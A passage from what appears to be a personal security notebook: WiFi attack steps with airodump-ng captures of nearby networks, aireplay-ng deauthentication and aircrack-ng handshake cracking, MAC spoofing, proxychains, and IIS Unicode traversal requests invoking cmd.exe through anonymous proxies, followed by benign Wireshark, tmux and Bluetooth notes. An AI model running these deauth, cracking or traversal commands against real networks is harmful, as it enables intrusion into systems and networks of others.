2 (not associated) FA:10:C5:AD:54:D2 -91 0 - 1 0 1 (not associated) 06:2C:D7:EA:72:DD -89 0 - 1 0 3 94:8F:CF:75:BE:00 84:EA:ED:4F:DA:81 -79 24e- 1e 0 8 C8:C7:50:F5:06:E0 C2:06:06:03:61:B3 -1 24e- 0 0 56 5C:E3:0E:94:A1:CC 74:E2:0C:38:70:02 -93 0 - 1 0 1 2C:99:24:61:7F:D9 54:E0:19:F3:D9:41 -88 0 - 1e 0 1 Quitting... kali This is the name of the file that we’re gonna store the captures in the channel that we’re gonna attack is one the BSSID that we’re gonna attack is 50:D4:F7:E5:66:F4 and the interface we’re gonna use is wlan0 $ airodump-ng -c 1 -w kali --bssid 50:D4:F7:E5:66:F4 wlan0 or $ airodump-ng -c 11 -w pokingaround --bssid F4:92:BF:38:DB:26 wlan1 Now we are capturing packets. Next we deauth a client. Deauth this host C2:06:06:03:61:B3 $ aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0 $ aireplay-ng –deauth 10 -a 50:D4:F7:E5:66:F4 wlan0 $ sudo aireplay-ng – deauth 50 -a (BSSID-MAC) (Wireless-Interface) In the above command it is optional to give the client mac address it is given by -c (client mac) Watch the other screen for the message that the handshake has been captured. CH 5 ][ Elapsed: 42 s ][ 2022-06-01 17:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E8:9F:80:43:55:91 -45 19 22 0 1 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:43:55:91 -26 15 0 0 1 360 WPA2 CCMP PSK ccccguest F2:9F:80:43:55:91 -26 5 0 0 1 360 WPA2 CCMP PSK (length: 0) C4:41:1E:26:0D:B4 -43 25 0 0 4 360 WPA2 CCMP PSK Office CA:41:1E:26:0D:B4 -43 23 0 0 4 360 WPA2 CCMP PSK Office_Private EE:9F:80:43:55:05 -49 21 0 0 11 360 WPA2 CCMP PSK ccccguest E8:9F:80:43:55:41 -49 4 0 0 6 360 WPA2 CCMP PSK CCCCPrivate F2:9F:80:43:55:05 -50 17 0 0 11 360 WPA2 CCMP PSK (length: 0) E8:9F:80:43:55:05 -50 22 24 0 11 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:EB:9C:13 -50 11 0 0 6 360 WPA2 CCMP PSK ccccguest EE:9F:80:43:55:41 -51 9 0 0 6 360 WPA2 CCMP PSK ccccguest F2:9F:80:43:55:41 -55 8 0 0 6 360 WPA2 CCMP PSK (length: 0) C0:74:AD:3C:15:0D -55 14 0 0 6 720 WPA3 CCMP SAE Horsepower B4:5D:50:C4:33:C4 -55 8 0 0 11 195 WPA2 CCMP PSK the593 E8:26:89:4C:B5:24 -56 9 0 0 6 130 WPA2 CCMP PSK the593 6C:AE:F6:86:91:B5 -58 5 0 0 2 360 OPN (length: 0) 6C:AE:F6:86:91:B1 -58 8 1 0 2 360 WPA3 CCMP SAE (length: 0) B4:5D:50:C4:33:C0 -59 4 0 0 11 195 WPA2 CCMP PSK (length: 0) B4:5D:50:C4:33:C5 -60 7 0 0 11 195 WPA2 CCMP PSK (length: 0) B4:5D:50:C4:33:C3 -60 6 0 0 11 195 OPN TSC_Customer_Wi-Fi E8:26:89:4C:B5:23 -60 13 0 0 6 130 OPN TSC_Customer_Wi-Fi F4:92:BF:38:DB:26 -61 6 7 0 11 270 WPA2 CCMP PSK (length: 0) 78:6A:1F:6C:88:14 -62 0 0 0 1 195 WPA2 CCMP PSK ARRIS-28A1 B4:5D:50:C4:33:C2 -62 4 0 0 11 195 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:20 -62 12 0 0 6 130 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:22 -62 17 0 0 6 130 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:21 -62 17 0 0 6 130 WPA2 CCMP PSK (length: 0) E8:9F:80:EB:9C:77 -62 9 13 0 1 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:EB:9C:77 -62 10 0 0 1 360 WPA2 CCMP PSK ccccguest A8:BD:27:69:EC:45 -64 4 0 0 1 195 WPA2 CCMP PSK (length: 0) CA:52:61:B0:26:21 -64 7 0 0 1 195 WPA2 CCMP PSK Ashbyfamily_guest 60:38:E0:D3:18:05 -64 1 1 0 4 260 WPA2 CCMP PSK Linksys14423 C8:52:61:B0:26:20 -64 1 3 0 1 195 WPA2 CCMP PSK Ashbyfamily A8:BD:27:6A:50:C1 -64 7 0 0 6 195 WPA2 CCMP PSK (length: 0) F2:9F:80:EB:9C:77 -64 7 0 0 1 360 WPA2 CCMP PSK (length: 0) E8:26:89:4C:B5:25 -65 8 0 0 6 130 WPA2 CCMP PSK (length: 0) A8:BD:27:69:EC:43 -65 11 0 0 1 195 OPN TSC_Customer_Wi-Fi C4:F1:74:8C:10:24 -66 2 0 0 1 360 WPA3 CCMP SAE (length: 0) 26:56:FE:C8:FD:3B -66 3 0 0 11 360 WPA2 CCMP PSK Protech E8:9F:80:EB:A3:B1 -67 2 0 0 1 360 WPA2 CCMP PSK CCCCPrivate EE:9F:80:EB:A3:B1 -67 5 0 0 1 360 WPA2 CCMP PSK ccccguest F2:9F:80:EB:A3:B1 -67 7 1 0 1 360 WPA2 CCMP PSK (length: 0) 32:56:FE:C8:FD:3B -67 5 0 0 11 360 OPN CC-Special 88:DC:96:49:B3:88 -67 11 0 0 6 270 WPA2 CCMP PSK CCCCPrivate D0:D3:E0:D5:D4:84 -67 8 0 0 1 130 WPA2 CCMP PSK the593 2C:99:24:97:3C:51 -67 0 0 0 1 195 WPA2 CCMP PSK ARRIS-3C53 Quitting... 4 Dec 28 13:36 Pictures.From.Android drwxr-xr-x 4 parth 4096 Jan 1 19:47 VMs CH 6 ][ Elapsed: 1 min ][ 2022-06-01 18:02 ][ display sta only BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) A4:8D:3B:17:E1:9B -46 0 - 1 0 5 CCCCOffice (not associated) 3C:9B:D6:91:70:E0 -58 0 - 1 39 18 StudentTech (not associated) 02:BE:B7:1C:58:58 -54 0 - 1 0 2 (not associated) F6:E2:F1:9C:C0:98 -58 0 - 1 0 1 (not associated) 3E:7F:3D:A3:AB:1D -60 0 - 1 0 1 (not associated) 1E:1A:98:E2:68:E7 -60 0 - 1 0 1 (not associated) 0E:81:25:3B:F4:FF -60 0 - 1 0 3 (not associated) C2:CB:98:1F:CB:17 -60 0 - 1 0 1 (not associated) 16:6B:BF:46:32:6D -62 0 - 1 0 1 (not associated) 2E:6D:57:2D:DE:9D -64 0 - 1 0 1 (not associated) 72:F6:77:95:BE:E3 -64 0 - 1 0 1 (not associated) 0A:9B:E3:68:B0:5A -68 0 - 1 0 1 (not associated) 2C:D9:74:87:8A:57 -68 0 - 1 0 6 MySpectrumWiFi98-5G (not associated) 1A:64:38:17:05:15 -70 0 - 1 0 1 (not associated) 3C:CF:5B:75:79:8B -70 0 - 1 0 4 (not associated) 0A:BE:F1:CA:92:FB -72 0 - 1 0 1 (not associated) AA:15:C6:47:04:88 -72 0 - 1 0 1 (not associated) F8:4F:AD:73:C9:14 -72 0 - 1 0 13 ARRIS-5522-5G (not associated) A2:60:33:1E:3C:90 -74 0 - 1 0 1 TMobileWingman (not associated) BA:B6:B1:BC:7A:5B -74 0 - 1 0 1 (not associated) D6:08:4A:7F:D3:C3 -74 0 - 1 0 2 (not associated) B4:EC:02:A9:A1:6B -74 0 - 1 0 4 (not associated) AC:89:95:79:1C:91 -76 0 - 1 0 1 ATT-WIFI-7052 (not associated) 36:6B:4C:FE:D4:01 -60 0 - 1 0 2 (not associated) 42:AE:2A:4D:87:07 -66 0 - 1 0 1 (not associated) 42:4A:A2:7E:8A:C9 -68 0 - 1 0 1 (not associated) AE:27:B2:59:73:55 -68 0 - 1 0 1 (not associated) D6:61:85:8C:7A:8A -82 0 - 1 0 2 (not associated) E6:2F:53:F0:AA:5D -78 0 - 1 0 1 (not associated) 12:C7:F6:EC:C9:F4 -70 0 - 1 0 1 (not associated) 62:98:AD:C6:FC:D6 -74 0 - 1 0 1 (not associated) 0C:EC:84:6F:C1:99 -70 0 - 1 0 2 6C:AE:F6:86:91:BC 6C:AE:F6:86:91:B1 -62 0 -11 0 3 00:00:00:00:00:00 0A:56:FE:C8:FD:3B -70 0 -12 0 2 00:25:00:FF:94:73 22:F1:A7:02:2A:7D -64 0 -12 0 2 00:25:00:FF:94:73 D6:FF:34:DE:7B:B8 -66 0 -12 0 1 E8:9F:80:43:55:91 DA:92:8A:19:A7:4A -16 0 -24 0 18 E8:9F:80:43:55:91 2C:64:1F:2A:DC:1A -58 6e-24e 0 11 8A:DC:96:49:B3:88 00:6B:9E:E9:E1:EB -76 0 - 1e 0 2 F4:92:BF:38:DB:26 F4:92:BF:38:DB:22 -76 12 -12 0 1081 C0:D7:AA:E0:F5:29 02:0A:F7:1D:1A:F8 -76 0 - 1 0 12 78:6A:1F:6C:88:14 18:69:D8:B7:F1:63 -72 0 - 1 0 2 D0:D3:E0:D5:D4:81 10:98:C3:61:88:1C -80 0 - 1 0 1 2C:99:24:8D:AE:09 5C:E5:0C:69:F7:B4 -72 0 - 1e 0 1 2C:99:24:8D:AE:09 A2:00:44:3A:DA:24 -74 0 - 1e 0 25 Quitting... BASE F4:92:BF:38:DB:26 -61 6 7 0 11 270 WPA2 CCMP PSK (length: 0) CLIENT F4:92:BF:38:DB:26 F4:92:BF:38:DB:22 -76 12 -12 0 1081 sudo airodump-ng -c 11 -w pokingaround --bssid F4:92:BF:38:DB:26 wlan1mom sudo aireplay-ng --deauth 32 -a F4:92:BF:38:DB:26 -c F4:92:BF:38:DB:22 wlan1mon $ sudo iw dev wlan0 station dump Station c6:52:61:97:05:b3 (on wlan0) inactive time: 396 ms rx bytes: 11411560 rx packets: 10411 tx bytes: 822955 tx packets: 4228 tx retries: 352 tx failed: 0 beacon loss: 0 beacon rx: 3521 rx drop misc: 35 signal: -58 [-58, -59] dBm signal avg: -54 dBm beacon signal avg: -53 dBm tx bitrate: 780.0 MBit/s VHT-MCS 8 80MHz short GI VHT-NSS 2 tx duration: 0 us rx bitrate: 866.7 MBit/s VHT-MCS 9 80MHz short GI VHT-NSS 2 rx duration: 0 us authorized: yes authenticated: yes associated: yes preamble: long WMM/WME: yes MFP: no TDLS peer: no DTIM period: 3 beacon interval:100 short slot time:yes connected time: 407 seconds associated at [boottime]: 21.301s associated at: 1654309294642 ms current time: 1654309701352 ms $ sudo nmap -sn 192.168.1.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 22:31 EDT Nmap scan report for unknowna48d3b1fe853.attlocal.net (192.168.1.65) Host is up (0.013s latency). MAC Address: A4:8D:3B:1F:E8:53 (Vizio) Nmap scan report for unknownc2a511992e38.attlocal.net (192.168.1.94) Host is up (0.039s latency). MAC Address: C2:A5:11:99:2E:38 (Unknown) Nmap scan report for RokuStreamingStick.attlocal.net (192.168.1.129) Host is up (0.0089s latency). MAC Address: D8:31:34:68:77:AF (Roku) Nmap scan report for 192.168.1.244 Host is up (0.29s latency). MAC Address: 52:52:CF:AE:9F:81 (Unknown) Nmap scan report for 192.168.1.253 Host is up (0.0037s latency). MAC Address: C8:52:61:97:05:B2 (Arris Group) Nmap scan report for dsldevice.attlocal.net (192.168.1.254) Host is up (0.0086s latency). MAC Address: C8:52:61:97:05:B0 (Arris Group) Nmap scan report for Parth.attlocal.net (192.168.1.230) Host is up. Nmap done: 256 IP addresses (7 hosts up) scanned in 5.83 seconds $ sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+") Interface: wlan0, type: EN10MB, MAC: b0:7d:64:e7:ba:a3, IPv4: 192.168.1.230 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.1.94 c2:a5:11:99:2e:38 (Unknown: locally administered) 192.168.1.253 c8:52:61:97:05:b2 ARRIS Group Inc. 192.168.1.254 c8:52:61:97:05:b0 ARRIS Group Inc. 192.168.1.129 d8:31:34:68:77:af Roku Inc. 192.168.1.65 a4:8d:3b:1f:e8:53 Vizio Inc. 192.168.1.65 a4:8d:3b:1f:e8:53 Vizio Inc. (DUP: 2) 6 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 1.574 seconds (162.64 hosts/sec). 6 responded Set a random mac $ sudo macchanger -r wlan1 Current MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.) Permanent MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.) New MAC: 72:04:d5:1a:2f:a8 (unknown) $ sudo macchanger -r wlan1 Current MAC: 72:04:d5:1a:2f:a8 (unknown) Permanent MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.) New MAC: 4a:d8:99:bf:6e:b $ sudo ifconfig wlan1 up $ ifconfig eth0: flags=4099(UP,BROADCAST,MULTICAST) mtu 1500 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 wlan0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.1.160 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::d3b2:3a33:674c:eb6a prefixlen 64 scopeid 0x20 ether b0:7d:64:e7:ba:a3 txqueuelen 1000 (Ethernet) RX packets 1922 bytes 397051 (387.7 KiB) RX errors 0 dropped 28 overruns 0 frame 0 TX packets 887 bytes 128410 (125.4 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.3.112 netmask 255.255.255.0 broadcast 192.168.3.255 inet6 fe80::44ad:62c7:252a:bc1f prefixlen 64 scopeid 0x20 ether 4a:d8:99:bf:6e:bb txqueuelen 1000 (Ethernet) RX packets 128 bytes 8246 (8.0 KiB) RX errors 0 dropped 94 overruns 0 frame 0 TX packets 61 bytes 5980 (5.8 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 Cracking with Hashcat we need to convert our .cap file to the equivalent hashcat file format .hccapx $ sudo macchanger -r wlan1 Current MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.) Permanent MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.) New MAC: 72:04:d5:1a:2f:a8 (unknown) $ sudo macchanger -r wlan1 Current MAC: 72:04:d5:1a:2f:a8 (unknown) Permanent MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.) New MAC: 4a:d8:99:bf:6e:b $ cap2hccapx.bin hackme.cap hackme.hccapx Cracking with aircrack-ng $ aircrack-ng pwd-01.cap -w /usr/share/wordlists/rockyou.txt $ aircrack-ng -w wordlist.txt kali-01.cap $ sudo aircrack-ng (packet-file-name) -w (wordlist_path)
To clear the contents of the swap space.
swapoff -a && swapon -a
To clear the buffer cache.
use "echo 1" echo "echo 1 > /proc/sys/vm/drop_caches"
---[Resources]--- (top)
Security in Linux Mint and Ubuntu: an Explanation and Some Tips
---[OSI Model]--- (top)
---[HTML Entities]--- (top)
---[Subnetting]--- (top)
---[MS Windows Section]--- (top)
---[MS Net command]---
---[The host file]--- (top)
The best resource: Steven Black (https://github.com/StevenBlack/hosts/blob/2.5.52/readme.md). There is also https://winhelp2002.mvps.org/hosts.txt
About one a month I pull down the latest version with this command. This plases the latest version in the Hacking/hosts/ directory. I then open that hosts file along with the production version and pull the custom enteries (near the top) into the new hosts file. Then I copy the updated version over the production version with the second command.
$ wget https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts $ cp sudo cp hosts /etc
This will reload the hosts file
sudo /etc/init.d/networking restart sudo /etc/init.d/dns-clean start # run this command to flush dns cache: sudo /etc/init.d/dns-clean restart # or use: sudo /etc/init.d/networking force-reload
---[Null Account]--- (top)
---[Connect to remote NTFS]---
---[ProxyChaining]--- (top)
GET www.private-server.com/cgi-bin/nph-a.cgi/http/127.0.0.1/Home.asp HTTP/1.0 GET proxy.spaceproxy.com/-_-http://127.0.0.1/Home.asp HTTP/1.0 GET ctservice.de/taker/cgi-bin/anon-www.cgi/http://127.0.0.1/Home.asp HTTP/1.0
These are examples of the above hops, with URL Unicode Exploits
GET 127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0 www.private-server.com/cgi-bin/nph-a.cgi/http/127.0.0.1/scripts/ HTTP/1.0 ..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair GET proxy.spaceproxy.com/-_-http://127.0.0.1/scripts/..%c0%af../winnt/ HTTP/1.0 system32/cmd.exe?/c+dir+c:\winnt\repair
The goal: setup nc to send a bunch of 404 at a TCP/80 to load info into its IIS logs, while hoping through a chain of proxies.
Step one: The command
target.host.com/This_is_a_test HTTP/1.0\n\n" | nc target.host.com 80 | less
Step two: Skipping the command through several proxies.
echo -e "GET http://proxy.spaceproxy.com/-_-http://target.host.com/ This_is_a_test HTTP/1.0\n\n" | nc target.host.com 80 | less
Recently confirmed (open) proxies:
Examples (Linux) of piping the HTTP header lines to netcat.
echo -e "HEAD http://127.0.0.1/ HTTP/1.0\n\n" | netcat 202.30.54.66 80 echo -e "GET http://127.0.0.1 HTTP/1.0\n\n" | netcat 212.42.103.7 80 echo -e "GET http://127.0.0.1 HTTP/1.0\n\n" | netcat 194.65.39.17 80v echo -e "GET http://127.0.0.1 HTTP/1.0\n\n" | netcat 195.142.170.3 80
The following are examples of hoping through an anon services, which can be chained.
GET 127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0 GET www.private-server.com/cgi-bin/nph-a.cgi/http/127.0.0.1/scripts/ ..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0 GET proxy.spaceproxy.com/-_-http://127.0.0.1/scripts/..%c0%af../winnt/ system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
Other anon services
sudo apt-get install tor nano /etc/proxychains.conf Remove Dynamic chain from comment comment Strict chain and Random chain Remove proxy DNS from comment write socks5 127.0.0.1 9050 in last line of proxy list
nano /etc/proxychains.conf
service tor restart proxychains firefox www.bing.com
https://www.geeksforgeeks.org/how-to-setup-proxychains-in-linux-without-any-errors/
proxychains nmap 192.168.1.1/24
Lets take a minute to break up the syntax above:
https://linuxhint.com/proxychains-tutorial/
Before we are using proxychains, we need to setup proxychains configuration file. We also need a list of proxy server. Proxychains configuration file located on /etc/proxychains.conf
By default proxychains directly sends the traffic first through our host at 127.0.0.1 on port 9050 (the default Tor configuration). If you are using Tor, leave this as it is. If you are not using Tor, you will need to comment out this line.
Study this page:
---[Add a new Linux user account]--- (top)
Create the new account.
# adduser username
Add the new user to the sudo group.
# usermod -aG sudo username
Test the new user account.
# su - username
As the new user, verify that you can use sudo by prepending “sudo” to the command that you want to run with superuser privileges.
# sudo ls -la /root
Remember...
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility.
---[Set a non-root user to run WireShark]--- (top)
Run these two commands, then log in/out of the non-root account.
$ sudo dpkg-reconfigure wireshark-common $ sudo usermod -a wireshark parth
---[Disabling rpcbind tcp/111]--- (top)
You can disable them by running the following commands as root:
update-rc.d nfs-common disable update-rc.d rpcbind disable
For systemd, get root and stop the service
# systemctl stop rpcbind.service Warning: Stopping rpcbind.service, but it can still be activated by: rpcbind.socket
disable the service:
# systemctl disable rpcbind.service Synchronizing state of rpcbind.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install disable rpcbind Removed /etc/systemd/system/sockets.target.wants/rpcbind.socket.
---[Wireshark expressions]--- (top)
If you want to show the MAC addresses, or the names corresponding to the MAC addresses, in the columns in the packet summary, go to Edit -> Preferences, select "Columns", and for the "Source" and "Destination" columns, select "Hardware src addr" and "Hardware dest addr", respectively.
Show only SMTP (port 25) and ICMP traffic:
tcp.port eq 25 or icmp
Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Filter on Windows -- Filter out noise, while watching Windows Client - DC exchanges
smb || nbns || dcerpc || nbss || dns
The "slice" feature is also useful to filter on the vendor identifier part (OUI) of the MAC address, see the Ethernet page for details. Thus you may restrict the display to only packets from a specific device manufacturer. E.g. for DELL machines only:
eth.addr[0:3]==00:06:5B
Capture only traffic to or from IP address 172.18.5.4:
host 172.18.5.4
Capture traffic to or from a range of IP addresses:
net 192.168.0.0/24 net 192.168.0.0 mask 255.255.255.0
Capture traffic from a range of IP addresses:
src net 192.168.0.0/24 src net 192.168.0.0 mask 255.255.255.0
Capture traffic to a range of IP addresses:
dst net 192.168.0.0/24 dst net 192.168.0.0 mask 255.255.255.0
Capture only DNS (port 53) traffic:
port 53
Capture non-HTTP and non-SMTP traffic on your server (both are equivalent):
host www.example.com and not (port 80 or port 25) host www.example.com and not port 80 and not port 25
Capture except all ARP and DNS traffic:
port not 53 and not arp
Capture traffic within a range of ports
tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)
Capture only Ethernet type EAPOL:
ether proto 0x888e
Designed to filter out certain types of protocols, it masks out arp, icmp, dns, or other protocols you think are not useful. This will allow you to focus of what traffic interests you.
!(arp or icmp or dns)
ICMP should be easy, just filter away echo request and reply (type 8 and 0). Unless you have funky stuff like address mask/timestamp requests that should only show problems. The best filter for this is
(icmp.type > 0 and icmp.type < 8) or icmp.type > 8
For bad TCP you could try to work with the filter
tcp.analysis.flags
all packets from/to the IP address 192.0.73.2, but that are error packets
ip.addr==192.0.73.2 and expert.severity==error.
You can utilize following filters:
tcp.analysis.lost_segment – Indicates we’ve seen a gap in sequence numbers in the capture. Packet loss can lead to duplicate ACKs, which leads to retransmissions.
tcp.analysis.retransmission – Displays all retransmissions in the capture. A few retransmissions are OK, excessive retransmissions are bad. This usually shows up as slow application performance and/or packet loss to the user.
TCP buffer full -- Source is instructing Destination to stop sending data
tcp.window_size == 0 && tcp.flags.reset != 1
ip.addr == 10.43.54.65 is equivalent to ip.src == 10.43.54.65 or ip.dst == 10.43.54.65 Match destination: ip.dst == x.x.x.x Match source: ip.src == x.x.x.x Match either: ip.addr == x.x.x.x
net 192.168.0.0 mask 255.255.255.0
net 192.168.0.0/24 or net 192.168.0.0 mask 255.255.255.0
src net 192.168.0.0/24 or src net 192.168.0.0 mask 255.255.255.0
dst net 192.168.0.0/24 or dst net 192.168.0.0 mask 255.255.255.0
Capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and multicast announcements:
not broadcast and not multicast
Show only the UDP based traffic:
udp
---[Kali Persistance]--- (top)
Setting Kali up on a USB with persistance
dd if=Downloads/kali-linux-2019.3-amd64.iso of=/dev/sdc bs=1M
dd if=Downloads/kali-linux-2019.4-amd64.iso of=/dev/sdc bs=512k
Ref: https://docs.kali.org/downloading/kali-linux-live-usb-persistence
Now open cfdisk to create a new primary partition from all the free space at the end of the disk. Then exit cfdisk.
$ sudo cfdisk /dev/sdb
Now format the new partition.
sudo mkfs.ext4 /dev/sdb3
Updating USB Kali (https://www.kali.org/docs/usb/updating-kali-on-usb/)
---[tmux]--- (top)
https://leanpub.com/the-tao-of-tmux/read
Ctrl+b c Create a new window (with shell). The first available number from the range 0...9 will be assigned to it. Ctrl+b w Choose window from a list Ctrl+b 0 Switch to window 0 (by number ) Ctrl+b , Rename the current window Ctrl+b % Split current pane horizontally into two panes Ctrl+b " Split current pane vertically into two panes Ctrl+b o Go to the next pane Ctrl+b ; Toggle between the current and previous pane Ctrl+b x Close the current pane Ctrl+b ? Help screen Ctrl+b d Detach from the session Reattach: tmux attach-session -t my_session
Command Result Prefix + c Create a new window Prefix + p Switch to the previous window Prefix + n Switch to the next window Prefix + 0-9 Switch to a window using it’s index number Prefix + w Choose a window from an interactive list exit Close a window Prefix + & Force kill-all processes in an unresponsive window Prefix + “ Split the active pane horizontally Prefix + % Split the active pane vertically Prefix + arrow key Switch to another pane Prefix + ALT+arrow Resize the active pane Prefix + z Zoom in on the active pane. Press the same combination again to exit zoom mode Prefix + x Force kill an unresponsive process in a pane Prefix + ( Switch to the previous session Prefix + ) Switch to the next session Prefix + s Display an interactive session list tmux ls List all available sessions tmux attach -t 0 Zoom in on the active pane. Press the same combination again to exit zoom mode tmux kill-server Destroy all sessions and kill all processes
Customize tmux by editing the ~/.tmux.conf file.
Start tmux with this syntax;
$ tmux source-file ~/.tmux.conf
https://man.openbsd.org/OpenBSD-current/man1/tmux.1
https://blog.hawkhost.com/2010/07/02/tmux-%e2%80%93-the-terminal-multiplexer-part-2/
---[Bluetooth]--- (top)
Sometimes, it happens that the Bluetooth device itself is blocked/disabled. This could happen due to software or hardware reasons. To check the device status, use the rfkill list command:
$ sudo rfkill list 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no 3: hci0: Bluetooth Soft blocked: no Hard blocked: no
$ sudo service bluetooth status bluetooth.service - Bluetooth service Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled) Active: inactive (dead) Docs: man:bluetoothd(8) $ sudo service bluetooth start 3 $ sudo service bluetooth status bluetooth.service - Bluetooth service Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled) Active: active (running) since Thu 2021-08-05 15:38:23 EDT; 2s ago Docs: man:bluetoothd(8) Main PID: 7869 (bluetoothd) Status: "Running" Tasks: 1 (limit: 37667) Memory: 2.8M CPU: 40ms CGroup: /system.slice/bluetooth.service 7869 /usr/libexec/bluetooth/bluetoothd Aug 05 15:38:23 parth systemd[1]: Starting Bluetooth service... Aug 05 15:38:23 parth bluetoothd[7869]: Bluetooth daemon 5.55 Aug 05 15:38:23 parth systemd[1]: Started Bluetooth service. Aug 05 15:38:23 parth bluetoothd[7869]: Starting SDP server Aug 05 15:38:23 parth bluetoothd[7869]: Bluetooth management interface 1.18 initialized Aug 05 15:38:23 parth bluetoothd[7869]: profiles/sap/server.c:sap_server_register() Sap driver initialization failed. Aug 05 15:38:23 parth bluetoothd[7869]: sap-server: Operation not permitted (1) Aug 05 15:38:23 parth bluetoothd[7869]: Endpoint registered: sender=:1.51 path=/MediaEndpoint/A2DPSink/sbc Aug 05 15:38:23 parth bluetoothd[7869]: Endpoint registered: sender=:1.51 path=/MediaEndpoint/A2DPSource/sbc $ bluelog Bluelog (v1.1.2) by MS3FGX --------------------------- Autodetecting device...OK Opening output file: bluelog-2021-08-05-1542.log...OK Writing PID file: /tmp/bluelog.pid...OK Scan started at [08/05/21 15:42:47] on 08:BE:AC:13:FF:0F. Hit Ctrl+C to end scan. ^C Closing files and freeing memory...Done! $ cat bluelog-2021-08-05-1542.log A8:2B:B9:1C:39:C7 Above, my Samsung Android phone was identified.
https://javahowtos.com/guides/129-linux/404-troubleshoot-and-enable-bluetooth-on-kali-linux.html
Resources: https://wiki.debian.org/BluetoothUser
$ sudo btmon Bluetooth monitor ver 5.50 = Note: Linux version 5.3.0-kali1-amd64 (x86_64) 0.698854 = Note: Bluetooth subsystem version 2.22 0.698856 = New Index: FC:F8:AE:26:86:F2 (Primary,USB,hci0) [hci0] 0.698857 = Open Index: FC:F8:AE:26:86:F2 [hci0] 0.698857 = Index Info: FC:F8:AE:26:86:F2 (Intel Corp.) [hci0] 0.698858 @ RAW Open: dumpcap (privileged) version 2.22 {0x0002} [hci0] 0.698858 @ MGMT Open: bluetoothd (privileged) version 1.14 {0x0001} 0.698859 @ MGMT Open: btmon (privileged) version 1.14 {0x0003} 0.698905 > HCI Event: Extended Inquiry Result (0x2f) plen 255 #1 [hci0] 1.297549 Num responses: 1 Address: EB:06:EF:EE:83:4B (OUI EB-06-EF) Page scan repetition mode: R1 (0x01) Page period mode: P0 (0x00) Class: 0x240404 Major class: Audio/Video (headset, speaker, stereo, video, vcr) Minor class: Wearable Headset Device Rendering (Printing, Speaker) Audio (Speaker, Microphone, Headset) Clock offset: 0x34ba RSSI: -43 dBm (0xd5) Name (complete): SH03 TX power: 4 dBm 16-bit Service UUIDs (partial): 7 entries Advanced Audio Distribution (0x110d) Audio Sink (0x110b) A/V Remote Control (0x110e) A/V Remote Control Controller (0x110f) Handsfree (0x111e) Headset (0x1108) Headset HS (0x1131) @ MGMT Event: Device Found (0x0012) plen 44 {0x0003} [hci0] 1.297632 BR/EDR Address: EB:06:EF:EE:83:4B (OUI EB-06-EF) RSSI: -43 dBm (0xd5) Flags: 0x00000000 Data length: 30 Name (complete): SH03 TX power: 4 dBm 16-bit Service UUIDs (partial): 7 entries Advanced Audio Distribution (0x110d) Audio Sink (0x110b) A/V Remote Control (0x110e) A/V Remote Control Controller (0x110f) Handsfree (0x111e) Headset (0x1108) Headset HS (0x1131) Class: 0x240404 Major class: Audio/Video (headset, speaker, stereo, video, vcr) Minor class: Wearable Headset Device Rendering (Printing, Speaker) Audio (Speaker, Microphone, Headset) @ MGMT Event: Device Found (0x0012) plen 44 {0x0001} [hci0] 1.297632 BR/EDR Address: EB:06:EF:EE:83:4B (OUI EB-06-EF) RSSI: -43 dBm (0xd5) Flags: 0x00000000 Data length: 30 Name (complete): SH03 TX power: 4 dBm 16-bit Service UUIDs (partial): 7 entries Advanced Audio Distribution (0x110d) Audio Sink (0x110b) A/V Remote Control (0x110e) A/V Remote Control Controller (0x110f) Handsfree (0x111e) Headset (0x1108) Headset HS (0x1131) Class: 0x240404 Major class: Audio/Video (headset, speaker, stereo, video, vcr) Minor class: Wearable Headset Device Rendering (Printing, Speaker) Audio (Speaker, Microphone, Headset) > HCI Event: Inquiry 